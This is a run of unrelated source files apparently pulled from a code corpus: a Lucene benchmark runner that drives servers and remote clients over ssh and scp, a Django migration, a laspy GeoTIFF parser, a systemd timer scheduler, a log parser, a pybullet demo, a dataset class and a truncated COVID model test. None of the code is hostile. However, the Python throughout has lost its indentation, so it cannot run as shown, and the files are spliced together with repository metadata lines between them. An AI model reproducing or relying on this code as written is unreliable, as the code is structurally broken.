# Do indexing/NRT reopens:
if DO_NRT:
if VERBOSE_INDEXING:
w('-verbose')
w('-nrt')
w('-indexThreadCount 1')
w('-docsPerSecPerThread %s' % DOCS_PER_SEC_PER_THREAD)
w('-lineDocsFile %s' % LINE_DOCS_FILE)
w('-reopenEverySec %g' % REOPEN_EVERY_SEC)
w('-store')
w('-tvs')
w('-postingsFormat %s' % postingsFormat)
w('-idFieldPostingsFormat %s' % postingsFormat)
w('-cloneDocs')
stdLog = '%s/std.log' % logsDir
if FRAGGER_JAR is not None:
idx = command.index('perf.SearchPerfTest')
command = '%s org.managedruntime.perftools.Fragger -v -a %s -exec %s' % (' '.join(command[:idx]), FRAGGER_ALLOC_MB_PER_SEC, ' '.join(command[idx:]))
else:
command = ' '.join(command)
command = '%s -d %s -l %s/hiccups %s > %s 2>&1' % \
(JHICCUP_PATH, WARMUP_SEC*1000, logsDir, command, stdLog)
p = None
vmstatProcess = None
zvRobotProcess = None
clientProcess = None
topThread = None
success = False
try:
touchCmd = '%s -Xmx1g -cp .:$LUCENE_HOME/build/core/classes/java:$LUCENE_HOME/build/codecs/classes/java:$LUCENE_HOME/build/highlighter/classes/java:$LUCENE_HOME/build/test-framework/classes/java:$LUCENE_HOME/build/queryparser/classes/java:$LUCENE_HOME/build/suggest/classes/java:$LUCENE_HOME/build/analysis/common/classes/java:$LUCENE_HOME/build/grouping/classes/java perf.OpenCloseIndexWriter %s 2>&1'.replace('$LUCENE_HOME', LUCENE_HOME) % (javaCommand, indexPath)
#print ' run %s' % touchCmd
while True:
print ' clean index'
if system(touchCmd):
print ' failed .. retry'
time.sleep(2.0)
else:
break
t0 = time.time()
vmstatProcess = subprocess.Popen('vmstat 1 > %s/vmstat.log 2>&1' % logsDir, shell=True)
print ' server command: %s' % command
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
if DO_ZV_ROBOT and desc.startswith('Zing'):
cmd = '%s -Xmx1g -jar %s %s/ZVRobot %s/ZVRobot.prop > %s/ZVRobot.log 2>&1' % \
(ORACLE_JVM, ZV_ROBOT_JAR, logsDir, os.path.split(ZV_ROBOT_JAR)[0], logsDir)
print ' ZVRobot command: %s' % cmd
zvRobotProcess = subprocess.Popen(cmd, shell=True)
del cmd
else:
zvRobotProcess = None
print ' wait for server startup...'
time.sleep(2.0)
while True:
try:
if open(stdLog).read().find(' ready for client...') != -1:
break
v = p.poll()
if p.poll() is not None:
raise RuntimeError(' failed to start:\n\n%s' % open(stdLog).read())
except IOError:
pass
time.sleep(1.0)
print ' %.1f sec to start; start test now' % (time.time()-t0)
time.sleep(2.0)
topThread = TopThread('%s/top.log' % logsDir)
topThread.setDaemon(True)
topThread.start()
t0 = time.time()
if CLIENT_HOST is not None:
# Remote client:
command = 'python -u %s %s %s %s %s %d %.1f results.bin' % \
(REMOTE_CLIENT, TASKS_FILE, SERVER_HOST, SERVER_PORT, targetQPS, TASKS_PER_CAT, RUN_TIME_SEC)
command = 'ssh %s@%s %s > %s/client.log 2>&1' % (CLIENT_USER, CLIENT_HOST, command, logsDir)
print ' client command: %s' % command
clientProcess = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
output = clientProcess.communicate()[0].strip()
if len(output) > 0:
print ' %s' % output.replace('\n', '\n ')
if clientProcess.returncode:
raise RuntimeError('client failed; see %s/client.log' % logsDir)
print ' copy results.bin back...'
if system('scp %s@%s:results.bin %s > /dev/null 2>&1' % (CLIENT_USER, CLIENT_HOST, logsDir)):
raise RuntimeError('scp results.bin failed')
if system('ssh %s@%s rm -f results.bin' % (CLIENT_USER, CLIENT_HOST)):
raise RuntimeError('rm results.bin failed')
else:
clientProcess = None
f = open('%s/client.log' % logsDir, 'wb')
sendTasks.run(TASKS_FILE, 'localhost', SERVER_PORT, targetQPS, TASKS_PER_CAT, RUN_TIME_SEC, '%s/results.bin' % logsDir, f, False)
f.close()
t1 = time.time()
print ' test done (%.1f total sec)' % (t1-t0)
if not SMOKE_TEST and (t1 - t0) > RUN_TIME_SEC * 1.30:
print ' marking this job finished'
finished = True
finally:
kill('SearchPerfTest', p)
kill('vmstat', vmstatProcess)
if clientProcess is not None:
kill('sendTasks.py', clientProcess)
if not os.path.exists('%s/results.bin' % logsDir):
print ' copy results.bin back...'
system('scp %s@%s:results.bin %s > /dev/null 2>&1' % (CLIENT_USER, CLIENT_HOST, logsDir))
if DO_ZV_ROBOT and zvRobotProcess is not None:
kill('ZVRobot', zvRobotProcess)
if topThread is not None:
topThread.stop = True
topThread.join()
print ' done stopping top'
try:
printAvgCPU('%s/top.log' % logsDir)
except:
print 'WARNING: failed to compute avg CPU usage:'
traceback.print_exc()
print ' done'
open('%s/done' % logsDir, 'wb').close()
if DO_EMAIL and os.path.getsize('%s/log.txt' % LOGS_DIR) < 5*1024*1024:
try:
emailResult(open('%s/log.txt' % LOGS_DIR).read(), 'Test RUNNING [%s]' % (datetime.datetime.now() - startTime))
except:
print ' send email failed'
traceback.print_exc()
return logsDir, finished
def run():
if SMOKE_TEST:
print
print '***SMOKE_TEST***'
print
captureEnv(LOGS_DIR)
print 'Compile java sources...'
cmd = '%sc -Xlint -Xlint:deprecation -cp $LUCENE_HOME/build/core/classes/java:$LUCENE_HOME/build/highlighter/classes/java:$LUCENE_HOME/build/codecs/classes/java:$LUCENE_HOME/build/test-framework/classes/java:$LUCENE_HOME/build/queryparser/classes/java:$LUCENE_HOME/build/suggest/classes/java:$LUCENE_HOME/build/analysis/common/classes/java:$LUCENE_HOME/build/grouping/classes/java perf/Args.java perf/IndexThreads.java perf/OpenCloseIndexWriter.java perf/Task.java perf/CreateQueries.java perf/LineFileDocs.java perf/PKLookupPerfTest.java perf/RandomQuery.java perf/SearchPerfTest.java perf/TaskParser.java perf/Indexer.java perf/LocalTaskSource.java perf/PKLookupTask.java perf/RemoteTaskSource.java perf/SearchTask.java perf/TaskSource.java perf/IndexState.java perf/NRTPerfTest.java perf/RespellTask.java perf/ShowFields.java perf/TaskThreads.java perf/KeepNoCommitsDeletionPolicy.java' % ORACLE_JVM
cmd = cmd.replace('$LUCENE_HOME', LUCENE_HOME)
if system(cmd):
raise RuntimeError('compile failed')
if CLIENT_HOST is not None:
print 'Copy sendTasks.py to client host %s' % CLIENT_HOST
if system('scp sendTasks.py %s@%s: > /dev/null 2>&1' % (CLIENT_USER, CLIENT_HOST)):
raise RuntimeError('copy sendTasks.py failed')
print 'Copy tasks file "%s" to client host %s' % (TASKS_FILE, CLIENT_HOST)
if system('scp %s %s@%s: > /dev/null 2>&1' % (TASKS_FILE, CLIENT_USER, CLIENT_HOST)):
raise RuntimeError('copy sendTasks.py failed')
startTime = datetime.datetime.now()
finished = set()
if DO_AUTO_QPS:
maxQPS = {}
reQPSOut = re.compile(r'; +([0-9\.]+) qps out')
reQueueSize = re.compile(r'\[(\d+), (\d+)\]$')
print
print 'Find max QPS per job:'
for job in JOBS:
desc, dirImpl, postingsFormat = job
logsDir = runOne(startTime, desc, dirImpl, postingsFormat, 'sweep')[0]
qpsOut = []
with open('%s/client.log' % logsDir) as f:
for line in f.readlines():
m = reQPSOut.search(line)
m2 = reQueueSize.search(line)
if m is not None and m2 is not None and int(m2.group(2)) > 200:
qpsOut.append(float(m.group(1)))
if len(qpsOut) < 10:
raise RuntimeError("couldn't find enough 'qps out' lines: got %d" % len(qpsOut))
# QPS out is avg of last 5 seconds ... make sure we only measure actual saturation
qpsOut = qpsOut[5:]
maxQPS[job] = sum(qpsOut)/len(qpsOut)
print ' QPS throughput=%.1f' % maxQPS[job]
if maxQPS[job] < 2*AUTO_QPS_START:
raise RuntimeError('max QPS for job %s (= %s) is < 2*AUTO_QPS_START (= %s)' % \
(desc, maxQPS[job], AUTO_QPS_START))
for pctPoint in AUTO_QPS_PERCENT_POINTS:
realJobsLeft = False
for job in JOBS:
if job in finished:
continue
desc, dirImpl, postingsFormat = job
targetQPS = AUTO_QPS_START + (pctPoint/100.)*(maxQPS[job] - AUTO_QPS_START)
if runOne(startTime, desc, dirImpl, postingsFormat, targetQPS, pct=pctPoint)[1]:
if desc.lower().find('warmup') == -1:
finished.add(job)
elif desc.lower().find('warmup') == -1:
realJobsLeft = True
if not realJobsLeft:
break
else:
# Which tasks exceeded capacity:
targetQPS = QPS_START
while len(finished) != len(JOBS):
realJobsLeft = False
for job in JOBS:
if job in finished:
continue
desc, dirImpl, postingsFormat = job
if runOne(startTime, desc, dirImpl, postingsFormat, targetQPS)[1]:
if desc.lower().find('warmup') == -1:
finished.add(job)
elif desc.lower().find('warmup') == -1:
realJobsLeft = True
if QPS_END is not None and targetQPS >= QPS_END:
break
if not realJobsLeft:
break
targetQPS += QPS_INC
now = datetime.datetime.now()
print
print '%s: ALL DONE (elapsed time %s)' % (now, now - startTime)
print
def printAvgCPU(topLog):
cpuCoreCount = int(os.popen('grep processor /proc/cpuinfo | wc').read().strip().split()[0])
entCount = 0
with open(topLog) as f:
byPid = {}
cpuCol = None
for line in f.readlines():
line = line.strip()
if line.startswith('Time'):
cpuCol = None
elif line.startswith('PID'):
cpuCol = line.split().index('%CPU')
entCount += 1
elif cpuCol is not None and entCount > 20:
cols = line.split()
if len(cols) > cpuCol:
pid = int(cols[0])
cpu = float(cols[cpuCol])
if pid not in byPid:
# sum, min, max, count
byPid[pid] = [0.0, None, None, 0]
l = byPid[pid]
l[0] += cpu
l[3] += 1
if l[1] is None:
l[1] = cpu
else:
l[1] = min(cpu, l[1])
if l[2] is None:
l[2] = cpu
else:
l[2] = max(cpu, l[2])
pids = []
for pid, (sum, minCPU, maxCPU, count) in byPid.items():
pids.append((sum/count, minCPU, maxCPU, pid))
pids.sort(reverse=True)
print ' CPU usage [%d CPU cores]' % cpuCoreCount
for avgCPU, minCPU, maxCPU, pid in pids:
if maxCPU > 20:
print ' avg %7.2f%% CPU, min %7.2f%%, max %7.2f%% pid %s' % (avgCPU, minCPU, maxCPU, pid)
def emailResult(body, subject):
fromAddress = toAddress = '<EMAIL>'
msg = email.mime.text.MIMEText(body)
msg["From"] = fromAddress
msg["To"] = toAddress
msg["Subject"] = subject
message = msg.as_string()
if USE_SMTP:
if False:
s = smtplib.SMTP('localhost')
else:
import localpass
s = smtplib.SMTP(localpass.SMTP_SERVER, port=localpass.SMTP_PORT)
s.ehlo(fromAddress)
s.starttls()
s.ehlo(fromAddress)
localpass.smtplogin(s)
print 'sending mail...'
s.sendmail(fromAddress, (toAddress,), message)
print 'quitting smtp...'
s.quit()
else:
p = subprocess.Popen(["/usr/sbin/sendmail", "-t"], stdin=subprocess.PIPE)
p.communicate(message)
def main():
if os.path.exists(LOGS_DIR):
raise RuntimeError('please move last logs dir away')
os.makedirs(LOGS_DIR)
logOut = open('%s/log.txt' % LOGS_DIR, 'wb')
teeStdout = Tee(logOut, 'stdout')
teeStderr = Tee(logOut, 'stderr')
failed = False
try:
run()
except:
traceback.print_exc()
failed = True
finally:
if os.path.exists('/localhome/ftpit.sh'):
system('/localhome/ftpit.sh')
logOut.flush()
if DO_EMAIL and os.path.getsize('%s/log.txt' % LOGS_DIR) < 5*1024*1024:
if failed:
subject = 'Test FAIL'
else:
subject = 'Test SUCCESS'
emailResult(open('%s/log.txt' % LOGS_DIR).read(), subject)
logOut.close()
os.chmod('%s/log.txt' % LOGS_DIR, 0444)
del teeStdout
del teeStderr
if __name__ == '__main__':
main()
|
capstone/capdb/migrations/0090_auto_20200127_2030.py | rachelaus/capstone | 134 | 12697065 | <gh_stars>100-1000
# Generated by Django 2.2.9 on 2020-01-27 20:30
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('capdb', '0089_auto_20200127_1957'),
]
operations = [
migrations.RemoveField(
model_name='casetext',
name='metadata',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_reporter',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_jurisdiction',
),
migrations.RemoveIndex(
model_name='casemetadata',
name='idx_in_scope_court',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_name',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_name_abbreviation',
),
migrations.RemoveField(
model_name='casemetadata',
name='court_slug',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_name',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_name_long',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_slug',
),
migrations.RemoveField(
model_name='casemetadata',
name='jurisdiction_whitelisted',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_name',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_name_abbreviation',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='court_slug',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_name',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_name_long',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_slug',
),
migrations.RemoveField(
model_name='historicalcasemetadata',
name='jurisdiction_whitelisted',
),
migrations.DeleteModel(
name='CaseText',
),
]
|
laspy/vlrs/geotiff.py | CCInc/laspy | 240 | 12697066 | <gh_stars>100-1000
import logging
from collections import namedtuple
from typing import List, Optional
from . import vlrlist
from .known import GeoAsciiParamsVlr, GeoDoubleParamsVlr, GeoKeyDirectoryVlr
GeoTiffKey = namedtuple("GeoTiffKey", ("id", "value"))
logger = logging.getLogger(__name__)
GTModelTypeGeoKey = 1024
GTRasterTypeGeoKey = 1025
GTCitationGeoKey = 1026
GeogCitationGeoKey = 2049
GeogAngularUnitsGeoKey = 2054
ProjectedCSTypeGeoKey = 3072
ProjLinearUnitsGeoKey = 3076
def parse_geo_tiff_keys_from_vlrs(vlr_list: vlrlist.VLRList) -> List[GeoTiffKey]:
"""Gets the 3 GeoTiff vlrs from the vlr_list and parse them into
a nicer structure
Parameters
----------
vlr_list: laspy.vrls.vlrslist.VLRList list of vlrs from a las file
Raises
------
IndexError if any of the needed GeoTiffVLR is not found in the list
Returns
-------
List of GeoTiff keys parsed from the VLRs
"""
geo_key_dir = vlr_list.get_by_id(
GeoKeyDirectoryVlr.official_user_id(), GeoKeyDirectoryVlr.official_record_ids()
)[0]
try:
geo_doubles = vlr_list.get_by_id(
GeoDoubleParamsVlr.official_user_id(),
GeoDoubleParamsVlr.official_record_ids(),
)[0]
except IndexError:
geo_doubles = None
try:
geo_ascii = vlr_list.get_by_id(
GeoAsciiParamsVlr.official_user_id(),
GeoAsciiParamsVlr.official_record_ids(),
)[0]
except IndexError:
geo_ascii = None
return parse_geo_tiff(geo_key_dir, geo_doubles, geo_ascii)
def parse_geo_tiff(
key_dir_vlr: GeoKeyDirectoryVlr,
double_vlr: Optional[GeoDoubleParamsVlr],
ascii_vlr: Optional[GeoAsciiParamsVlr],
) -> List[GeoTiffKey]:
"""Parses the GeoTiff VLRs information into nicer structs"""
geotiff_keys = []
for k in key_dir_vlr.geo_keys:
if k.tiff_tag_location == 0:
value = k.value_offset
elif k.tiff_tag_location == 34736:
if double_vlr is None:
raise RuntimeError(
"Geotiff tag location points to GeoDoubleParams, "
"but it does not exists"
)
value = double_vlr.doubles[k.value_offset]
elif k.tiff_tag_location == 34737:
if ascii_vlr is None:
raise RuntimeError(
"Geotiff tag location points to GeoAsciiParams, "
"but it does not exists"
)
value = ascii_vlr.string(k.value_offset, k.count)
else:
logger.warning(
"GeoTiffKey with unknown tiff tag location ({})".format(
k.tiff_tag_location
)
)
continue
geotiff_keys.append(GeoTiffKey(k.id, value))
return geotiff_keys
|
bups/scheduler/systemd_user.py | emersion/bups | 106 | 12697092 | import ConfigParser
import io
import os
base_dir = os.getenv("XDG_CONFIG_DIR", os.path.join(os.path.expanduser("~"), ".config"))
config_dir = os.path.join(base_dir, "systemd/user")
def is_available():
return any(os.access(os.path.join(path, "systemctl"), os.X_OK)
for path in os.getenv("PATH").split(os.pathsep))
def get_timer_path(job_id):
return os.path.join(config_dir, job_id + ".timer")
def get_service_path(job_id):
return os.path.join(config_dir, job_id + ".service")
def new_config():
config = ConfigParser.RawConfigParser()
config.optionxform = str
return config
def parse_config(timer_cfg):
config = new_config()
config.readfp(io.BytesIO(timer_cfg))
period = config.get("Timer", "OnCalendar").split('/')[1]
return { "period": period, "delay": "0" }
def get_job(job_id):
with open(get_timer_path(job_id), "r") as f:
cfg = parse_config(f.read())
cfg["id"] = job_id
return cfg
def write_config(config, file_path):
with open(file_path, "w") as f:
config.write(f)
def update_job(job):
job_id = job["id"]
period = job["period"]
command = job["command"]
# Timer
config = new_config()
config.add_section("Unit")
config.set("Unit", "Description", "Bups backup manager timer")
config.add_section("Timer")
config.set("Timer", "OnCalendar", "*-*-1/%d" % period)
config.set("Timer", "Persistent", "true")
config.add_section("Install")
config.set("Install", "WantedBy", "timers.target")
write_config(config, get_timer_path(job_id))
# Create service
config = new_config()
config.add_section("Unit")
config.set("Unit", "Description", "Bups backup manager service")
config.add_section("Service")
config.set("Service", "Type", "simple")
config.set("Service", "ExecStart", command)
write_config(config, get_service_path(job_id))
# Notify systemd
call_systemctl(["daemon-reload"])
call_systemctl(["enable", get_timer_path(job_id)])
call_systemctl(["start", job_id])
def remove_job(job_id):
timer_path = get_timer_path(job_id)
service_path = get_service_path(job_id)
timer_basename = os.path.basename(timer_path)
call_systemctl(["stop", timer_basename])
call_systemctl(["disable", timer_basename])
os.remove(timer_path)
os.remove(service_path)
def call_systemctl(args):
cmd = "systemctl --user %s" % " ".join(args)
if os.system(cmd) != 0:
raise IOError("Failed to run command: %" % cmd)
|
insights/parsers/secure.py | mglantz/insights-core | 121 | 12697104 | """
Secure - file ``/var/log/secure``
==================================
"""
from .. import Syslog, parser
from insights.specs import Specs
@parser(Specs.secure)
class Secure(Syslog):
"""Class for parsing the ``/var/log/secure`` file.
Sample log text::
Aug 24 09:31:39 localhost polkitd[822]: Finished loading, compiling and executing 6 rules
Aug 24 09:31:39 localhost polkitd[822]: Acquired the name org.freedesktop.PolicyKit1 on the system bus
Aug 25 13:52:54 localhost sshd[23085]: pam_unix(sshd:session): session opened for user zjj by (uid=0)
Aug 25 13:52:54 localhost sshd[23085]: error: openpty: No such file or directory
.. note::
Please refer to its super-class :class:`insights.core.Syslog`
.. note::
Because timestamps in the secure log by default have no year,
the year of the logs will be inferred from the year in your
timestamp. This will also work around December/January crossovers.
Examples:
>>> secure = shared[Secure]
>>> secure.get('session opened')
[{'timestamp':'Aug 25 13:52:54',
'hostname':'localhost',
'procname': 'sshd[23085]',
'message': 'pam_unix(sshd:session): session opened for user zjj by (uid=0)',
'raw_message': 'Aug 25 13:52:54 localhost sshd[23085]: pam_unix(sshd:session): session opened for user zjj by (uid=0)'
}]
>>> len(list(secure.get_after(datetime(2017, 8, 25, 0, 0, 0))))
2
"""
time_format = '%b %d %H:%M:%S'
|
examples/pybullet/examples/getTextureUid.py | stolk/bullet3 | 158 | 12697145 | import pybullet as p
p.connect(p.GUI)
plane = p.loadURDF("plane.urdf")
visualData = p.getVisualShapeData(plane, p.VISUAL_SHAPE_DATA_TEXTURE_UNIQUE_IDS)
print(visualData)
curTexUid = visualData[0][8]
print(curTexUid)
texUid = p.loadTexture("tex256.png")
print("texUid=", texUid)
p.changeVisualShape(plane, -1, textureUniqueId=texUid)
for i in range(100):
p.getCameraImage(320, 200)
p.changeVisualShape(plane, -1, textureUniqueId=curTexUid)
for i in range(100):
p.getCameraImage(320, 200)
|
data/dataset.py | Alan-delete/I2L-MeshNet_RELEASE | 544 | 12697147 | import random
import numpy as np
from torch.utils.data.dataset import Dataset
from config import cfg
class MultipleDatasets(Dataset):
def __init__(self, dbs, make_same_len=True):
self.dbs = dbs
self.db_num = len(self.dbs)
self.max_db_data_num = max([len(db) for db in dbs])
self.db_len_cumsum = np.cumsum([len(db) for db in dbs])
self.make_same_len = make_same_len
def __len__(self):
# all dbs have the same length
if self.make_same_len:
return self.max_db_data_num * self.db_num
# each db has different length
else:
return sum([len(db) for db in self.dbs])
def __getitem__(self, index):
if self.make_same_len:
db_idx = index // self.max_db_data_num
data_idx = index % self.max_db_data_num
if data_idx >= len(self.dbs[db_idx]) * (self.max_db_data_num // len(self.dbs[db_idx])): # last batch: random sampling
data_idx = random.randint(0,len(self.dbs[db_idx])-1)
else: # before last batch: use modular
data_idx = data_idx % len(self.dbs[db_idx])
else:
for i in range(self.db_num):
if index < self.db_len_cumsum[i]:
db_idx = i
break
if db_idx == 0:
data_idx = index
else:
data_idx = index - self.db_len_cumsum[db_idx-1]
return self.dbs[db_idx][data_idx]
|
Lib/test/test_compiler/testcorpus/03_list_ex.py | diogommartins/cinder | 1,886 | 12697149 | [a, *b, *d, a, c]
|
covid_epidemiology/src/models/definitions/us_model_definitions_test.py | DionysisChristopoulos/google-research | 23,901 | 12697154 | <reponame>DionysisChristopoulos/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for models.definitions.us_model_definitions."""
import unittest
import numpy as np
import pandas as pd
from covid_epidemiology.src import constants
from covid_epidemiology.src.models.definitions import us_model_definitions
class TestStateModelDefinition(unittest.TestCase):
def test_get_ts_features(self):
expected_ts_features = {
constants.DEATH:
constants.JHU_DEATH_FEATURE_KEY,
constants.CONFIRMED:
constants.JHU_CONFIRMED_FEATURE_KEY,
constants.RECOVERED_DOC:
constants.RECOVERED_FEATURE_KEY,
constants.HOSPITALIZED:
constants.HOSPITALIZED_FEATURE_KEY,
constants.HOSPITALIZED_INCREASE:
constants.HOSPITALIZED_INCREASE_FEATURE_KEY,
constants.ICU:
constants.ICU_FEATURE_KEY,
constants.VENTILATOR:
constants.VENTILATOR_FEATURE_KEY,
constants.MOBILITY_INDEX:
constants.MOBILITY_INDEX,
constants.MOBILITY_SAMPLES:
constants.MOBILITY_SAMPLES,
constants.TOTAL_TESTS:
constants.TOTAL_TESTS,
constants.AMP_RESTAURANTS:
constants.AMP_RESTAURANTS,
constants.AMP_NON_ESSENTIAL_BUSINESS:
constants.AMP_NON_ESSENTIAL_BUSINESS,
constants.AMP_STAY_AT_HOME:
constants.AMP_STAY_AT_HOME,
constants.AMP_SCHOOLS_SECONDARY_EDUCATION:
constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
constants.AMP_EMERGENCY_DECLARATION:
constants.AMP_EMERGENCY_DECLARATION,
constants.AMP_GATHERINGS:
constants.AMP_GATHERINGS,
constants.AMP_FACE_MASKS:
constants.AMP_FACE_MASKS,
constants.DOW_WINDOW:
constants.DOW_WINDOW,
constants.AVERAGE_TEMPERATURE:
constants.AVERAGE_TEMPERATURE,
constants.MAX_TEMPERATURE:
constants.MAX_TEMPERATURE,
constants.MIN_TEMPERATURE:
constants.MIN_TEMPERATURE,
constants.RAINFALL:
constants.RAINFALL,
constants.SNOWFALL:
constants.SNOWFALL,
constants.COMMERCIAL_SCORE:
constants.COMMERCIAL_SCORE,
constants.ANTIGEN_POSITIVE:
constants.ANTIGEN_POSITIVE,
constants.ANTIGEN_TOTAL:
constants.ANTIGEN_TOTAL,
constants.ANTIBODY_NEGATIVE:
constants.ANTIBODY_NEGATIVE,
constants.ANTIBODY_TOTAL:
constants.ANTIBODY_TOTAL,
constants.SYMPTOM_COUGH:
constants.SYMPTOM_COUGH,
constants.SYMPTOM_CHILLS:
constants.SYMPTOM_CHILLS,
constants.SYMPTOM_ANOSMIA:
constants.SYMPTOM_ANOSMIA,
constants.SYMPTOM_INFECTION:
constants.SYMPTOM_INFECTION,
constants.SYMPTOM_CHEST_PAIN:
constants.SYMPTOM_CHEST_PAIN,
constants.SYMPTOM_FEVER:
constants.SYMPTOM_FEVER,
constants.SYMPTOM_SHORTNESSBREATH:
constants.SYMPTOM_SHORTNESSBREATH,
constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL:
constants.VACCINES_GOVEX_FIRST_DOSE_TOTAL,
constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL:
constants.VACCINES_GOVEX_SECOND_DOSE_TOTAL,
}
state_model = us_model_definitions.StateModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_ts_features = state_model.get_ts_features()
np.testing.assert_equal(expected_ts_features, actual_ts_features)
def test_get_ts_features_to_preprocess(self):
expected_ts_features = {
constants.MOBILITY_INDEX,
constants.MOBILITY_SAMPLES,
constants.AMP_RESTAURANTS,
constants.AMP_NON_ESSENTIAL_BUSINESS,
constants.AMP_STAY_AT_HOME,
constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
constants.AMP_EMERGENCY_DECLARATION,
constants.AMP_GATHERINGS,
constants.AMP_FACE_MASKS,
constants.CONFIRMED_PER_TESTS,
constants.DEATH_PREPROCESSED,
constants.CONFIRMED_PREPROCESSED,
constants.DOW_WINDOW,
constants.TOTAL_TESTS_PER_CAPITA,
constants.TOTAL_TESTS,
constants.AVERAGE_TEMPERATURE,
constants.MAX_TEMPERATURE,
constants.MIN_TEMPERATURE,
constants.RAINFALL,
constants.SNOWFALL,
constants.COMMERCIAL_SCORE,
constants.ANTIGEN_POSITIVE_RATIO,
constants.ANTIBODY_NEGATIVE_RATIO,
constants.SYMPTOM_COUGH,
constants.SYMPTOM_CHILLS,
constants.SYMPTOM_ANOSMIA,
constants.SYMPTOM_INFECTION,
constants.SYMPTOM_CHEST_PAIN,
constants.SYMPTOM_FEVER,
constants.SYMPTOM_SHORTNESSBREATH,
constants.VACCINATED_RATIO_FIRST_DOSE_PER_DAY_PREPROCESSED,
constants.VACCINATED_RATIO_SECOND_DOSE_PER_DAY_PREPROCESSED,
}
state_model = us_model_definitions.StateModelDefinition(
gt_source=constants.GT_SOURCE_JHU)
actual_ts_features = state_model.get_ts_features_to_preprocess()
np.testing.assert_equal(expected_ts_features, actual_ts_features)
def test_extract_ts_state_features(self):
ts_data = pd.DataFrame([
{
"feature_name": constants.JHU_CONFIRMED_FEATURE_KEY,
"feature_value": 100,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.JHU_CONFIRMED_FEATURE_KEY,
"feature_value": 200,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.JHU_DEATH_FEATURE_KEY,
"feature_value": 10,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.JHU_DEATH_FEATURE_KEY,
"feature_value": float("nan"), # Not populated should ffill to 10.
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.HOSPITALIZED_FEATURE_KEY,
"feature_value": 100,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.HOSPITALIZED_FEATURE_KEY,
"feature_value": 200,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.ICU_FEATURE_KEY,
"feature_value": 2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.ICU_FEATURE_KEY,
"feature_value": 5,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.VENTILATOR_FEATURE_KEY,
"feature_value": 50,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.VENTILATOR_FEATURE_KEY,
"feature_value": 100,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_INDEX,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_INDEX,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_SAMPLES,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.MOBILITY_SAMPLES,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.TOTAL_TESTS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.TOTAL_TESTS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_GATHERINGS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_GATHERINGS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_EMERGENCY_DECLARATION,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_EMERGENCY_DECLARATION,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_SCHOOLS_SECONDARY_EDUCATION,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_RESTAURANTS,
"feature_value": 1.0,
"dt": np.datetime64("2020-01-23"),
"geo_id": "4059"
},
{
"feature_name": constants.AMP_RESTAURANTS,
"feature_value": 1.2,
"dt": np.datetime64("2020-01-22"),
"geo_id": "4059"
},
{
